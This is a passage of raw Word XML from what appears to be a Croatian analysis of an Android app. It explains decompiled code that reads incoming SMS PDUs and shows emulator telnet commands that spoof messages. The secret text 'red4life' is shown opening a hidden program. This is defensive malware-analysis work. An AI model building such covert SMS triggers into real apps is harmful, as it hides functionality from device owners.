        <w:t xml:space="preserve">Dakle, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>smsmessage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> je tipa SmsMessage, a stvara se metodom </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>createFromPdu((byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>)aobj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>[i]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00D212D3">
        <w:t xml:space="preserve">. Za potpunu sigurnost je li to doista SMS poruka, potrebno je provjeriti varijablu </w:t>
      </w:r>
      <w:r w:rsidR="00D212D3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>aobj</w:t>
      </w:r>
      <w:r w:rsidR="00D212D3">
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>[i]:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D212D3" w:rsidRPr="0086242F" w:rsidRDefault="00D212D3" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>_L1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D212D3" w:rsidRPr="0086242F" w:rsidRDefault="00D212D3" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        Object aobj[];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D212D3" w:rsidRPr="0086242F" w:rsidRDefault="00D212D3" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        int i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D212D3" w:rsidRPr="0086242F" w:rsidRDefault="00D212D3" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        aobj = (Object[])bundle.get("pdus");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D212D3" w:rsidRPr="0086242F" w:rsidRDefault="00D212D3" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        i = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D212D3" w:rsidRDefault="00D212D3" w:rsidP="00D212D3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D212D3" w:rsidRDefault="00D212D3" w:rsidP="00D212D3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U ovom odsječku koda se saznaje da je </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>aobj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> tipa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> te se dobiva metodom </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>bundle.get(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D212D3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>"pdus"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>. To je ispravna metoda za dohvaćanje SMS poruke. PDU („protocol description unit”) je industrijski fo</w:t>
      </w:r>
      <w:r w:rsidR="00C97C82">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">mat za SMS poruku, a poruka se mora pohraniti u polje jer se može sadržavati od više manjih. Varijabla </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> se postavi na nulu što znači da se gleda samo prvi član poruke.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D212D3" w:rsidRDefault="00D212D3" w:rsidP="00D212D3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t>Nakon što je ustanovljena ini</w:t>
      </w:r>
      <w:r w:rsidR="0061669D">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">cijalizacija varijable </w:t>
      </w:r>
      <w:r w:rsidR="0061669D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>msg</w:t>
      </w:r>
      <w:r w:rsidR="0061669D">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> pokušat će se s otvaranjem programa slanjem lažirane poruke, budući da virtualni Android OS ne sadrži SIM karticu, sadržaja </w:t>
      </w:r>
      <w:r w:rsidR="0061669D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>„Hello”</w:t>
      </w:r>
      <w:r w:rsidR="0061669D">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> te </w:t>
      </w:r>
      <w:r w:rsidR="0061669D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>„red4life”</w:t>
      </w:r>
      <w:r w:rsidR="0061669D">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>, odnosno vrijednost koja ne bi trebala izazvati promjenu te vrijednost koja bi trebala izazvati poruku kao što je prethodno navedeno u tekstu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0061669D" w:rsidRDefault="0061669D" w:rsidP="0061669D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t>Poruka se lažira korištenjem telnet servisa. Otvori se konzola, odnosno command prompt te se upiše sljedeće:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0061669D" w:rsidRDefault="0061669D" w:rsidP="0061669D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>adb devices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0061669D" w:rsidRDefault="0061669D" w:rsidP="0061669D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">telnet localhost </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>[port]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0061669D" w:rsidRDefault="0061669D" w:rsidP="0061669D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>sms</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> send [broj] [sadr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>žaj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0061669D" w:rsidRDefault="0061669D" w:rsidP="0061669D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0061669D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>Adb devices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> daje informaciju </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>na</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> kojemu portu uređaj sluša, naredbom </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>telnet localhost [port]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> se spoji na ure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">đaj preko telnet servisa, a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">sms send </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>[broj] [sadr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>žaj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00B77F4A">
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> pošalje uređaju poruku.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001730B1" w:rsidRDefault="00B35A13" w:rsidP="001730B1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251657728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2540</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5756275" cy="551180"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:wrapSquare wrapText="right"/>
            <wp:docPr id="35" name="Slika 2" descr="ADB devices nare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B devices naredb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6275" cy="5511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27448">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>Slika 4.15</w:t>
      </w:r>
      <w:r w:rsidR="001730B1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001730B1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adb devices naredba</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001730B1" w:rsidRDefault="001730B1" w:rsidP="001730B1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001730B1" w:rsidRDefault="00B35A13" w:rsidP="001730B1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5757545" cy="472440"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="27" name="Slika 27" descr="Spajanje na te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ajanje na teln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7545" cy="472440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91F99" w:rsidRPr="00D91F99" w:rsidRDefault="00327448" w:rsidP="00D91F99">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>Slika 4.16</w:t>
      </w:r>
      <w:r w:rsidR="00D91F99">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D91F99">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Spajanje </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D91F99">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>na</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D91F99">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> telnet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B77F4A" w:rsidRDefault="00B77F4A" w:rsidP="0061669D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B77F4A" w:rsidRDefault="00B77F4A" w:rsidP="0045692C">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:tab/>
        <w:t>Kao što je očekivano</w:t>
      </w:r>
      <w:r w:rsidR="0045692C">
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">, poruka sadržaja </w:t>
      </w:r>
      <w:r w:rsidR="0045692C">
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidR="0045692C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>Hello</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0045692C">
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>“ nije</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0045692C">
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> izazvala nikakvu reakciju.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91F99" w:rsidRDefault="00D91F99" w:rsidP="0045692C">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D91F99" w:rsidRDefault="00B35A13" w:rsidP="0045692C">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5757545" cy="713740"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28" name="Slika 28" descr="Slanje poruke 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anje poruke Hell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7545" cy="713740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91F99" w:rsidRDefault="00343AF6" w:rsidP="00D91F99">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>Slika 4.17</w:t>
      </w:r>
      <w:r w:rsidR="00D91F99">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>. Slanje poruke „Hello“</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91F99" w:rsidRDefault="00D91F99" w:rsidP="00D91F99">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D91F99" w:rsidRDefault="00B35A13" w:rsidP="00D91F99">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1899285" cy="3235325"/>
            <wp:effectExtent l="0" t="0" r="5715" b="3175"/>
            <wp:docPr id="29" name="Slika 29" descr="Nakon Hello se nista nije des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kon Hello se nista nije desil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9285" cy="3235325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91F99" w:rsidRPr="00D91F99" w:rsidRDefault="00D91F99" w:rsidP="00697D52">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Slika 4.</w:t>
      </w:r>
      <w:r w:rsidR="00697D52">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>. Nakon poslane poruke, ništa se nije dogodilo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0045692C" w:rsidRDefault="0045692C" w:rsidP="0045692C">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0045692C" w:rsidRDefault="0045692C" w:rsidP="0045692C">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:tab/>
        <w:t>S druge strane, poruka sadržaja „</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>red4life</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>“ je otvorila aplikaciju i omogućila već navedene opcije.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91F99" w:rsidRDefault="00D91F99" w:rsidP="0045692C">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D91F99" w:rsidRDefault="00B35A13" w:rsidP="0045692C">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5757545" cy="482600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30" name="Slika 30" descr="Slanje poruke red4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nje poruke red4lif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7545" cy="482600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91F99" w:rsidRDefault="00D91F99" w:rsidP="009436A5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>Slika 4.</w:t>
      </w:r>
      <w:r w:rsidR="009436A5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>. Slanje poruke „red4life“</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91F99" w:rsidRDefault="00D91F99" w:rsidP="00D91F99">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D91F99" w:rsidRDefault="00B35A13" w:rsidP="00D91F99">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3145155" cy="5375910"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31" name="Slika 31" descr="Pojava pr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java program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5155" cy="5375910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91F99" w:rsidRPr="00D91F99" w:rsidRDefault="00D91F99" w:rsidP="00355D46">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>Slika 4.</w:t>
      </w:r>
      <w:r w:rsidR="00355D46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>. Pojava programa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0B6F" w:rsidRDefault="000C0B6F" w:rsidP="000C0B6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C0B6F" w:rsidRPr="00711A86" w:rsidRDefault="0031725F" w:rsidP="0031725F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
